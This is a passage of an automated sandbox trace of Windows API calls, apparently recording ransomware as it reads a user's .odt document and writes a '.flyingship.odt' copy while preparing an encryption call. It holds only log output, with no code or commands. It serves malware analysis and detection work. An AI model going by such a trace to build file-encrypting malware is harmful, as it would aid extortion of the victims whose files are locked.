returned 0x4 [0172.816] CryptDestroyHash (hHash=0x90af58) returned 1 [0172.816] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.816] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\p_2chhlm.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0172.816] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.816] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0172.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0172.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.816] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.816] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.816] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0172.817] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0172.817] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.817] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0172.817] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.818] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.818] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0172.819] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml")) returned 0x10 [0172.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0172.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0172.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0172.819] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0172.819] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa5f008 [0172.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.820] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0172.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\p_2chhlm.flyingship.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0172.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0172.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.823] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.823] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0172.823] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0172.824] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0172.824] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0172.824] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.824] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0172.824] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0172.825] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0172.825] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0172.828] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x18f8, lpOverlapped=0x0) returned 1 [0172.828] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0172.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0172.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.828] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x118f8) returned 0xa6f010 [0172.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x118f8) returned 0xa80910 [0172.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x118f8) returned 0xa6f010 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0172.831] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0172.831] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0172.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x118f8) returned 0xa6f010 [0172.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0172.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2828 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0172.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0172.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x118f8) returned 0x9d5188 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0172.833] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0172.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0172.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0172.834] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0172.834] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0172.834] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 